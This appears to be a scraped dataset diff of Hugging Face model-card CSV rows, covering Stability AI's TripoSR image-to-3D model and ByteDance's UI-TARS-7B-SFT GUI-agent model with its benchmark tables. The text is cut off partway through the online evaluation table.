qihoo360/TinyR1-32B-Preview\nlibrary_name: transformers\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67c2fa085c1ed1f81020a6b0"", ""modelId"": ""Apel-sin/tinyR1-32B-preview-exl2"", ""usedStorage"": 33683930512}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Apel-sin/tinyR1-32B-preview-exl2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BApel-sin%2FtinyR1-32B-preview-exl2%5D(%2FApel-sin%2FtinyR1-32B-preview-exl2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
TripoSR_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
stabilityai/TripoSR,"---
|
| 3 |
+
datasets:
|
| 4 |
+
- allenai/objaverse
|
| 5 |
+
tags:
|
| 6 |
+
- 3d
|
| 7 |
+
extra_gated_fields:
|
| 8 |
+
Name: text
|
| 9 |
+
Email: text
|
| 10 |
+
Country: text
|
| 11 |
+
Organization or Affiliation: text
|
| 12 |
+
I ALLOW Stability AI to email me about new model releases: checkbox
|
| 13 |
+
license: mit
|
| 14 |
+
pipeline_tag: image-to-3d
|
| 15 |
+
---
|
| 16 |
+
|
| 17 |
+
> Try our new model: **SF3D** with several improvements such as faster generation and more game-ready assets.
|
| 18 |
+
>
|
| 19 |
+
> The model is available [here](https://huggingface.co/stabilityai/stable-fast-3d) and we also have a [demo](https://huggingface.co/spaces/stabilityai/stable-fast-3d).
|
| 20 |
+
|
| 21 |
+
# TripoSR
|
| 22 |
+

|
| 23 |
+
TripoSR is a fast and feed-forward 3D generative model developed in collaboration between Stability AI and Tripo AI.
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
## Model Details
|
| 27 |
+
|
| 28 |
+
### Model Description
|
| 29 |
+
|
| 30 |
+
We closely follow [LRM](https://arxiv.org/abs/2311.04400) network architecture for the model design, where TripoSR incorporates a series of technical advancements over the LRM model in terms of both data curation as well as model and training improvements. For more technical details and evaluations, please refer to [our tech report](https://arxiv.org/abs/2403.02151).
|
| 31 |
+
|
| 32 |
+
* **Developed by**: [Stability AI](https://stability.ai/), [Tripo AI](https://tripo3d.ai/)
|
| 33 |
+
* **Model type**: Feed-forward 3D reconstruction from a single image
|
| 34 |
+
* **License**: MIT
|
| 35 |
+
* **Hardware**: We train `TripoSR` for 5 days on 22 GPU nodes each with 8 A100 40GB GPUs
|
| 36 |
+
|
| 37 |
+
### Model Sources
|
| 38 |
+
|
| 39 |
+
* **Repository**: https://github.com/VAST-AI-Research/TripoSR
|
| 40 |
+
* **Tech report**: https://arxiv.org/abs/2403.02151
|
| 41 |
+
* **Demo**: https://huggingface.co/spaces/stabilityai/TripoSR
|
| 42 |
+
|
| 43 |
+
### Training Dataset
|
| 44 |
+
|
| 45 |
+
We use renders from the [Objaverse](https://objaverse.allenai.org/objaverse-1.0) dataset, utilizing our enhanced rendering method that more closely replicate the distribution of images found in the real world, significantly improving our model’s ability to generalize. We selected a carefully curated subset of the Objaverse dataset for the training data, which is available under the CC-BY license.
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
## Usage
|
| 49 |
+
|
| 50 |
+
* For usage instructions, please refer to our [TripoSR GitHub repository](https://github.com/VAST-AI-Research/TripoSR)
|
| 51 |
+
|
| 52 |
+
* You can also try it in [our gradio demo](https://huggingface.co/spaces/stabilityai/TripoSR)
|
| 53 |
+
|
| 54 |
+
|
| 55 |
+
### Misuse, Malicious Use, and Out-of-Scope Use
|
| 56 |
+
|
| 57 |
+
The model should not be used to intentionally create or disseminate 3D models that people would foreseeably find disturbing, distressing, or offensive; or content that propagates historical or current stereotypes.","{""id"": ""stabilityai/TripoSR"", ""author"": ""stabilityai"", ""sha"": ""5b521936b01fbe1890f6f9baed0254ab6351c04a"", ""last_modified"": ""2024-08-09 08:52:03+00:00"", ""created_at"": ""2024-02-29 13:01:16+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 18326, ""downloads_all_time"": null, ""likes"": 543, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""3d"", ""image-to-3d"", ""dataset:allenai/objaverse"", ""arxiv:2311.04400"", ""arxiv:2403.02151"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""image-to-3d"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- allenai/objaverse\nlicense: mit\npipeline_tag: image-to-3d\ntags:\n- 3d\nextra_gated_fields:\n Name: text\n Email: text\n Country: text\n Organization or Affiliation: text\n I ALLOW Stability AI to email me about new model releases: checkbox"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='figures/input800.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='figures/output_examples.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.ckpt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""stabilityai/TripoSR"", ""hansyan/perflow-triposr"", ""KwabsHug/GameConfigIdea"", ""Nymbo/TripoSR"", ""gdTharusha/3D-Modle-Generator"", ""cocktailpeanut/TripoSR"", ""mrfakename/text-to-3D"", ""RamAnanth1/3D-Arena-Router"", ""IAMTFRMZA/3DGenTripoSR"", ""AleenDG/3DGenTripoSR"", ""CazC/smallville"", ""bigskaven/perflow-triposr"", ""cocktailpeanut/perflow-triposr"", ""elioonpc/TripoSRBlender"", ""tsi-org/perflow-triposr"", ""SicarioOtsutsuki/image"", ""ABHISHEKSINGH0204/to_3d_model_1"", ""seawolf2357/TripoSR"", ""mrdas/TripoSR"", ""seawolf2357/tex3"", ""Mathdesenvnonimate/TripoSR"", ""sammyview80/img_3d"", ""CaramelTEQUILA/Spriter3D"", ""hideosnes/I23D"", ""michaelj/TripoSR"", ""Haoyu7121/TripoSR"", ""SergioGreenDragon/SergioGreenDragonGenerate"", ""CrazyEric/TripoSR"", ""vibs08/Text-to-3D"", ""vibs08/Image-3D"", ""vibs08/image-3d-fastapi"", ""vibs08/FastAPI-Text-to-3D"", ""adarshh9/tripo-std"", ""ashh757/triposr-s3"", ""adarshh9/tripo-custom"", ""ashh757/tripo-custom"", ""KIMKIMKIMku/TripoSR"", ""fdyue/TripoSR"", ""Zaiiida/3D-Modle-Generator"", ""ergosumdre/TripoSR"", ""XtewaldX/TripoSR"", ""JescYip/TripoSR"", ""Mariakarkar/TripoSR"", ""Vuvo11/InteriorDesign_TripoSR"", ""vishnumeher/vhn-3d"", ""Vuvo11/InteriorBusiness_AI_API""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-09 08:52:03+00:00"", ""cardData"": ""datasets:\n- allenai/objaverse\nlicense: mit\npipeline_tag: image-to-3d\ntags:\n- 3d\nextra_gated_fields:\n Name: text\n Email: text\n Country: text\n Organization or Affiliation: text\n I ALLOW Stability AI to email me about new model releases: checkbox"", ""transformersInfo"": null, ""_id"": ""65e0801cbfa5aa61ab04294a"", ""modelId"": ""stabilityai/TripoSR"", ""usedStorage"": 5262702691}",0,,0,,0,,0,,0,"AleenDG/3DGenTripoSR, IAMTFRMZA/3DGenTripoSR, KwabsHug/GameConfigIdea, Nymbo/TripoSR, RamAnanth1/3D-Arena-Router, ashh757/triposr-s3, cocktailpeanut/TripoSR, gdTharusha/3D-Modle-Generator, hansyan/perflow-triposr, huggingface/InferenceSupport/discussions/298, mrfakename/text-to-3D, stabilityai/TripoSR, stabilityai/stable-fast-3d, vishnumeher/vhn-3d",14
|
UI-TARS-7B-SFT_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,197 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
ByteDance-Seed/UI-TARS-7B-SFT,"---
|
| 3 |
+
license: apache-2.0
|
| 4 |
+
language:
|
| 5 |
+
- en
|
| 6 |
+
pipeline_tag: image-text-to-text
|
| 7 |
+
tags:
|
| 8 |
+
- multimodal
|
| 9 |
+
- gui
|
| 10 |
+
library_name: transformers
|
| 11 |
+
---
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
# UI-TARS-7B-SFT
|
| 15 |
+
[UI-TARS-2B-SFT](https://huggingface.co/bytedance-research/UI-TARS-2B-SFT) |
|
| 16 |
+
[UI-TARS-7B-SFT](https://huggingface.co/bytedance-research/UI-TARS-7B-SFT) |
|
| 17 |
+
[**UI-TARS-7B-DPO**](https://huggingface.co/bytedance-research/UI-TARS-7B-DPO)(Recommended) |
|
| 18 |
+
[UI-TARS-72B-SFT](https://huggingface.co/bytedance-research/UI-TARS-72B-SFT) |
|
| 19 |
+
[**UI-TARS-72B-DPO**](https://huggingface.co/bytedance-research/UI-TARS-72B-DPO)(Recommended)
|
| 20 |
+
## Introduction
|
| 21 |
+
|
| 22 |
+
UI-TARS is a next-generation native GUI agent model designed to interact seamlessly with graphical user interfaces (GUIs) using human-like perception, reasoning, and action capabilities. Unlike traditional modular frameworks, UI-TARS integrates all key components—perception, reasoning, grounding, and memory—within a single vision-language model (VLM), enabling end-to-end task automation without predefined workflows or manual rules.
|
| 23 |
+
<!--  -->
|
| 24 |
+
<p align=""center"">
|
| 25 |
+
<img src=""https://github.com/bytedance/UI-TARS/blob/main/figures/UI-TARS-vs-Previous-SOTA.png?raw=true"" width=""90%""/>
|
| 26 |
+
<p>
|
| 27 |
+
<p align=""center"">
|
| 28 |
+
<img src=""https://github.com/bytedance/UI-TARS/blob/main/figures/UI-TARS.png?raw=true"" width=""90%""/>
|
| 29 |
+
<p>
|
| 30 |
+
|
| 31 |
+
<!--  -->
|
| 32 |
+
|
| 33 |
+
This repository contains the model for the paper [UI-TARS: Pioneering Automated GUI Interaction with Native Agents](https://huggingface.co/papers/2501.12326).
|
| 34 |
+
|
| 35 |
+
Code: https://github.com/bytedance/UI-TARS
|
| 36 |
+
|
| 37 |
+
## Performance
|
| 38 |
+
**Perception Capabilty Evaluation**
|
| 39 |
+
| Model | VisualWebBench | WebSRC | SQAshort |
|
| 40 |
+
|---------------------------|---------------|---------|----------|
|
| 41 |
+
| Qwen2-VL-7B | 73.3 | 81.8 | 84.9 |
|
| 42 |
+
| Qwen-VL-Max | 74.1 | 91.1 | 78.6 |
|
| 43 |
+
| Gemini-1.5-Pro | 75.4 | 88.9 | 82.2 |
|
| 44 |
+
| UIX-Qwen2-7B | 75.9 | 82.9 | 78.8 |
|
| 45 |
+
| Claude-3.5-Sonnet | 78.2 | 90.4 | 83.1 |
|
| 46 |
+
| GPT-4o | 78.5 | 87.7 | 82.3 |
|
| 47 |
+
| **UI-TARS-2B** | 72.9 | 89.2 | 86.4 |
|
| 48 |
+
| **UI-TARS-7B** | 79.7 | **93.6** | 87.7 |
|
| 49 |
+
| **UI-TARS-72B** | **82.8** | 89.3 | **88.6** |
|
| 50 |
+
|
| 51 |
+
**Grounding Capability Evaluation**
|
| 52 |
+
- **ScreenSpot Pro**
|
| 53 |
+
|
| 54 |
+
| Agent Model | Dev-Text | Dev-Icon | Dev-Avg | Creative-Text | Creative-Icon | Creative-Avg | CAD-Text | CAD-Icon | CAD-Avg | Scientific-Text | Scientific-Icon | Scientific-Avg | Office-Text | Office-Icon | Office-Avg | OS-Text | OS-Icon | OS-Avg | Avg-Text | Avg-Icon | Avg |
|
| 55 |
+
|--------------------------|----------|----------|----------|--------------|--------------|--------------|---------|---------|---------|---------------|---------------|---------------|------------|------------|------------|--------|--------|--------|---------|---------|------|
|
| 56 |
+
| QwenVL-7B | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.7 | 0.0 | 0.4 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.1 | 0.0 | **0.1** |
|
| 57 |
+
| GPT-4o | 1.3 | 0.0 | 0.7 | 1.0 | 0.0 | 0.6 | 2.0 | 0.0 | 1.5 | 2.1 | 0.0 | 1.2 | 1.1 | 0.0 | 0.9 | 0.0 | 0.0 | 0.0 | 1.3 | 0.0 | **0.8** |
|
| 58 |
+
| SeeClick | 0.6 | 0.0 | 0.3 | 1.0 | 0.0 | 0.6 | 2.5 | 0.0 | 1.9 | 3.5 | 0.0 | 2.0 | 1.1 | 0.0 | 0.9 | 2.8 | 0.0 | 1.5 | 1.8 | 0.0 | **1.1** |
|
| 59 |
+
| Qwen2-VL-7B | 2.6 | 0.0 | 1.3 | 1.5 | 0.0 | 0.9 | 0.5 | 0.0 | 0.4 | 6.3 | 0.0 | 3.5 | 3.4 | 1.9 | 3.0 | 0.9 | 0.0 | 0.5 | 2.5 | 0.2 | **1.6** |
|
| 60 |
+
| OS-Atlas-4B | 7.1 | 0.0 | 3.7 | 3.0 | 1.4 | 2.3 | 2.0 | 0.0 | 1.5 | 9.0 | 5.5 | 7.5 | 5.1 | 3.8 | 4.8 | 5.6 | 0.0 | 3.1 | 5.0 | 1.7 | **3.7** |
|
| 61 |
+
| ShowUI-2B | 16.9 | 1.4 | 9.4 | 9.1 | 0.0 | 5.3 | 2.5 | 0.0 | 1.9 | 13.2 | 7.3 | 10.6 | 15.3 | 7.5 | 13.5 | 10.3 | 2.2 | 6.6 | 10.8 | 2.6 | **7.7** |
|
| 62 |
+
| CogAgent-18B | 14.9 | 0.7 | 8.0 | 9.6 | 0.0 | 5.6 | 7.1 | 3.1 | 6.1 | 22.2 | 1.8 | 13.4 | 13.0 | 0.0 | 10.0 | 5.6 | 0.0 | 3.1 | 12.0 | 0.8 | **7.7** |
|
| 63 |
+
| Aria-UI | 16.2 | 0.0 | 8.4 | 23.7 | 2.1 | 14.7 | 7.6 | 1.6 | 6.1 | 27.1 | 6.4 | 18.1 | 20.3 | 1.9 | 16.1 | 4.7 | 0.0 | 2.6 | 17.1 | 2.0 | **11.3** |
|
| 64 |
+
| UGround-7B | 26.6 | 2.1 | 14.7 | 27.3 | 2.8 | 17.0 | 14.2 | 1.6 | 11.1 | 31.9 | 2.7 | 19.3 | 31.6 | 11.3 | 27.0 | 17.8 | 0.0 | 9.7 | 25.0 | 2.8 | **16.5** |
|
| 65 |
+
| Claude Computer Use | 22.0 | 3.9 | 12.6 | 25.9 | 3.4 | 16.8 | 14.5 | 3.7 | 11.9 | 33.9 | 15.8 | 25.8 | 30.1 | 16.3 | 26.9 | 11.0 | 4.5 | 8.1 | 23.4 | 7.1 | **17.1** |
|
| 66 |
+
| OS-Atlas-7B | 33.1 | 1.4 | 17.7 | 28.8 | 2.8 | 17.9 | 12.2 | 4.7 | 10.3 | 37.5 | 7.3 | 24.4 | 33.9 | 5.7 | 27.4 | 27.1 | 4.5 | 16.8 | 28.1 | 4.0 | **18.9** |
|
| 67 |
+
| UGround-V1-7B | - | - | 35.5 | - | - | 27.8 | - | - | 13.5 | - | - | 38.8 | - | - | 48.8 | - | - | 26.1 | - | - | **31.1** |
|
| 68 |
+
| **UI-TARS-2B** | 47.4 | 4.1 | 26.4 | 42.9 | 6.3 | 27.6 | 17.8 | 4.7 | 14.6 | 56.9 | 17.3 | 39.8 | 50.3 | 17.0 | 42.6 | 21.5 | 5.6 | 14.3 | 39.6 | 8.4 | **27.7** |
|
| 69 |
+
| **UI-TARS-7B** | 58.4 | 12.4 | 36.1 | 50.0 | 9.1 | 32.8 | **20.8**| 9.4 | **18.0**| 63.9 | **31.8** | **50.0** | **63.3** | 20.8 | 53.5 | 30.8 | **16.9**| 24.5 | 47.8 | 16.2 | **35.7** |
|
| 70 |
+
| **UI-TARS-72B** | **63.0** | **17.3** | **40.8** | **57.1** | **15.4** | **39.6** | 18.8 | **12.5**| 17.2 | **64.6** | 20.9 | 45.7 | **63.3** | **26.4** | **54.8** | **42.1**| 15.7 | **30.1**| **50.9**| **17.5**| **38.1** |
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
- **ScreenSpot**
|
| 74 |
+
|
| 75 |
+
| Method | Mobile-Text | Mobile-Icon/Widget | Desktop-Text | Desktop-Icon/Widget | Web-Text | Web-Icon/Widget | Avg |
|
| 76 |
+
|--------|-------------|-------------|-------------|-------------|-------------|---------|---------|
|
| 77 |
+
| **Agent Framework** | | | | | | | |
|
| 78 |
+
| GPT-4 (SeeClick) | 76.6 | 55.5 | 68.0 | 28.6 | 40.9 | 23.3 | **48.8** |
|
| 79 |
+
| GPT-4 (OmniParser) | 93.9 | 57.0 | 91.3 | 63.6 | 81.3 | 51.0 | **73.0** |
|
| 80 |
+
| GPT-4 (UGround-7B) | 90.1 | 70.3 | 87.1 | 55.7 | 85.7 | 64.6 | **75.6** |
|
| 81 |
+
| GPT-4o (SeeClick) | 81.0 | 59.8 | 69.6 | 33.6 | 43.9 | 26.2 | **52.3** |
|
| 82 |
+
| GPT-4o (UGround-7B) | 93.4 | 76.9 | 92.8 | 67.9 | 88.7 | 68.9 | **81.4** |
|
| 83 |
+
| **Agent Model** | | | | | | | |
|
| 84 |
+
| GPT-4 | 22.6 | 24.5 | 20.2 | 11.8 | 9.2 | 8.8 | **16.2** |
|
| 85 |
+
| GPT-4o | 20.2 | 24.9 | 21.1 | 23.6 | 12.2 | 7.8 | **18.3** |
|
| 86 |
+
| CogAgent | 67.0 | 24.0 | 74.2 | 20.0 | 70.4 | 28.6 | **47.4** |
|
| 87 |
+
| SeeClick | 78.0 | 52.0 | 72.2 | 30.0 | 55.7 | 32.5 | **53.4** |
|
| 88 |
+
| Qwen2-VL | 75.5 | 60.7 | 76.3 | 54.3 | 35.2 | 25.7 | **55.3** |
|
| 89 |
+
| UGround-7B | 82.8 | 60.3 | 82.5 | 63.6 | 80.4 | 70.4 | **73.3** |
|
| 90 |
+
| Aguvis-G-7B | 88.3 | 78.2 | 88.1 | 70.7 | 85.7 | 74.8 | **81.8** |
|
| 91 |
+
| OS-Atlas-7B | 93.0 | 72.9 | 91.8 | 62.9 | 90.9 | 74.3 | **82.5** |
|
| 92 |
+
| Claude Computer Use | - | - | - | - | - | - | **83.0** |
|
| 93 |
+
| Gemini 2.0 (Project Mariner) | - | - | - | - | - | - | **84.0** |
|
| 94 |
+
| Aguvis-7B | **95.6** | 77.7 | 93.8 | 67.1 | 88.3 | 75.2 | **84.4** |
|
| 95 |
+
| Aguvis-72B | 94.5 | **85.2** | 95.4 | 77.9 | **91.3** | **85.9** | **89.2** |
|
| 96 |
+
| **Our Model** | | | | | | | |
|
| 97 |
+
| **UI-TARS-2B** | 93.0 | 75.5 | 90.7 | 68.6 | 84.3 | 74.8 | **82.3** |
|
| 98 |
+
| **UI-TARS-7B** | 94.5 | **85.2** | **95.9** | 85.7 | 90.0 | 83.5 | **89.5** |
|
| 99 |
+
| **UI-TARS-72B** | 94.9 | 82.5 | 89.7 | **88.6** | 88.7 | 85.0 | **88.4** |
|
| 100 |
+
|
| 101 |
+
|
| 102 |
+
- **ScreenSpot v2**
|
| 103 |
+
|
| 104 |
+
| Method | Mobile-Text | Mobile-Icon/Widget | Desktop-Text | Desktop-Icon/Widget | Web-Text | Web-Icon/Widget | Avg |
|
| 105 |
+
|--------|-------------|-------------|-------------|-------------|-------------|---------|---------|
|
| 106 |
+
| **Agent Framework** | | | | | | | |
|
| 107 |
+
| GPT-4o (SeeClick) | 85.2 | 58.8 | 79.9 | 37.1 | 72.7 | 30.1 | **63.6** |
|
| 108 |
+
| GPT-4o (OS-Atlas-4B) | 95.5 | 75.8 | 79.4 | 49.3 | 90.2 | 66.5 | **79.1** |
|
| 109 |
+
| GPT-4o (OS-Atlas-7B) | 96.2 | 83.4 | 89.7 | 69.3 | **94.0** | 79.8 | **87.1** |
|
| 110 |
+
| **Agent Model** | | | | | | | |
|
| 111 |
+
| SeeClick | 78.4 | 50.7 | 70.1 | 29.3 | 55.2 | 32.5 | **55.1** |
|
| 112 |
+
| OS-Atlas-4B | 87.2 | 59.7 | 72.7 | 46.4 | 85.9 | 63.1 | **71.9** |
|
| 113 |
+
| OS-Atlas-7B | 95.2 | 75.8 | 90.7 | 63.6 | 90.6 | 77.3 | **84.1** |
|
| 114 |
+
| **Our Model** | | | | | | | |
|
| 115 |
+
| **UI-TARS-2B** | 95.2 | 79.1 | 90.7 | 68.6 | 87.2 | 78.3 | **84.7** |
|
| 116 |
+
| **UI-TARS-7B** | **96.9** | **89.1** | **95.4** | 85.0 | 93.6 | 85.2 | **91.6** |
|
| 117 |
+
| **UI-TARS-72B** | 94.8 | 86.3 | 91.2 | **87.9** | 91.5 | **87.7** | **90.3** |
|
| 118 |
+
|
| 119 |
+
|
| 120 |
+
**Offline Agent Capability Evaluation**
|
| 121 |
+
- **Multimodal Mind2Web**
|
| 122 |
+
|
| 123 |
+
| Method | Cross-Task Ele.Acc | Cross-Task Op.F1 | Cross-Task Step SR | Cross-Website Ele.Acc | Cross-Website Op.F1 | Cross-Website Step SR | Cross-Domain Ele.Acc | Cross-Domain Op.F1 | Cross-Domain Step SR |
|
| 124 |
+
|--------|----------------------|-------------------|--------------------|----------------------|--------------------|-------------------|--------------------|-------------------|-------------------|
|
| 125 |
+
| **Agent Framework** | | | | | | | | | |
|
| 126 |
+
| GPT-4o (SeeClick) | 32.1 | - | - | 33.1 | - | - | 33.5 | - | - |
|
| 127 |
+
| GPT-4o (UGround) | 47.7 | - | - | 46.0 | - | - | 46.6 | - | - |
|
| 128 |
+
| GPT-4o (Aria-UI) | 57.6 | - | - | 57.7 | - | - | 61.4 | - | - |
|
| 129 |
+
| GPT-4V (OmniParser) | 42.4 | 87.6 | 39.4 | 41.0 | 84.8 | 36.5 | 45.5 | 85.7 | 42.0 |
|
| 130 |
+
| **Agent Model** | | | | | | | | | |
|
| 131 |
+
| GPT-4o | 5.7 | 77.2 | 4.3 | 5.7 | 79.0 | 3.9 | 5.5 | 86.4 | 4.5 |
|
| 132 |
+
| GPT-4 (SOM) | 29.6 | - | 20.3 | 20.1 | - | 13.9 | 27.0 | - | 23.7 |
|
| 133 |
+
| GPT-3.5 (Text-only) | 19.4 | 59.2 | 16.8 | 14.9 | 56.5 | 14.1 | 25.2 | 57.9 | 24.1 |
|
| 134 |
+
| GPT-4 (Text-only) | 40.8 | 63.1 | 32.3 | 30.2 | 61.0 | 27.0 | 35.4 | 61.9 | 29.7 |
|
| 135 |
+
| Claude | 62.7 | 84.7 | 53.5 | 59.5 | 79.6 | 47.7 | 64.5 | 85.4 | 56.4 |
|
| 136 |
+
| Aguvis-7B | 64.2 | 89.8 | 60.4 | 60.7 | 88.1 | 54.6 | 60.4 | 89.2 | 56.6 |
|
| 137 |
+
| CogAgent | - | - | 62.3 | - | - | 54.0 | - | - | 59.4 |
|
| 138 |
+
| Aguvis-72B | 69.5 | 90.8 | 64.0 | 62.6 | 88.6 | 56.5 | 63.5 | 88.5 | 58.2 |
|
| 139 |
+
| **Our Model** | | | | | | | | | |
|
| 140 |
+
| **UI-TARS-2B** | 62.3 | 90.0 | 56.3 | 58.5 | 87.2 | 50.8 | 58.8 | 89.6 | 52.3 |
|
| 141 |
+
| **UI-TARS-7B** | 73.1 | 92.2 | 67.1 | 68.2 | 90.9 | 61.7 | 66.6 | 90.9 | 60.5 |
|
| 142 |
+
| **UI-TARS-72B** | **74.7** | **92.5** | **68.6** | **72.4** | **91.2** | **63.5** | **68.9** | **91.8** | **62.1** |
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
- **Android Control and GUI Odyssey**
|
| 146 |
+
|
| 147 |
+
| Agent Models | AndroidControl-Low Type | AndroidControl-Low Grounding | AndroidControl-Low SR | AndroidControl-High Type | AndroidControl-High Grounding | AndroidControl-High SR | GUIOdyssey Type | GUIOdyssey Grounding | GUIOdyssey SR |
|
| 148 |
+
|---------------------|----------------------|----------------------|----------------|----------------------|----------------------|----------------|----------------|----------------|----------------|
|
| 149 |
+
| Claude | 74.3 | 0.0 | 19.4 | 63.7 | 0.0 | 12.5 | 60.9 | 0.0 | 3.1 |
|
| 150 |
+
| GPT-4o | 74.3 | 0.0 | 19.4 | 66.3 | 0.0 | 20.8 | 34.3 | 0.0 | 3.3 |
|
| 151 |
+
| SeeClick | 93.0 | 73.4 | 75.0 | 82.9 | 62.9 | 59.1 | 71.0 | 52.4 | 53.9 |
|
| 152 |
+
| InternVL-2-4B | 90.9 | 84.1 | 80.1 | 84.1 | 72.7 | 66.7 | 82.1 | 55.5 | 51.5 |
|
| 153 |
+
| Qwen2-VL-7B | 91.9 | 86.5 | 82.6 | 83.8 | 77.7 | 69.7 | 83.5 | 65.9 | 60.2 |
|
| 154 |
+
| Aria-UI | -- | 87.7 | 67.3 | -- | 43.2 | 10.2 | -- | 86.8 | 36.5 |
|
| 155 |
+
| OS-Atlas-4B | 91.9 | 83.8 | 80.6 | 84.7 | 73.8 | 67.5 | 83.5 | 61.4 | 56.4 |
|
| 156 |
+
| OS-Atlas-7B | 93.6 | 88.0 | 85.2 | 85.2 | 78.5 | 71.2 | 84.5 | 67.8 | 62.0 |
|
| 157 |
+
| Aguvis-7B | -- | -- | 80.5 | -- | -- | 61.5 | -- | -- | -- |
|
| 158 |
+
| Aguvis-72B | -- | -- | 84.4 | -- | -- | 66.4 | -- | -- | -- |
|
| 159 |
+
| **UI-TARS-2B** | **98.1** | 87.3 | 89.3 | 81.2 | 78.4 | 68.9 | 93.9 | 86.8 | 83.4 |
|
| 160 |
+
| **UI-TARS-7B** | 98.0 | 89.3 | 90.8 | 83.7 | 80.5 | 72.5 | 94.6 | 90.1 | 87.0 |
|
| 161 |
+
| **UI-TARS-72B** | **98.1** | **89.9** | **91.3** | **85.2** | **81.5** | **74.7** | **95.4** | **91.4** | **88.6** |
|
| 162 |
+
|
| 163 |
+
**Online Agent Capability Evaluation**
|
| 164 |
+
|
| 165 |
+
| Method | OSWorld (Online) | AndroidWorld (Online) |
|
| 166 |
+
|--------|-------------------|------------------|
|
| 167 |
+
| **Agent Framework** | | |
|
| 168 |
+
| GPT-4o (UGround) | - | 32.8 |
|
| 169 |
+
| GPT-4o (Aria-UI) | 15.2 | 44.8 |
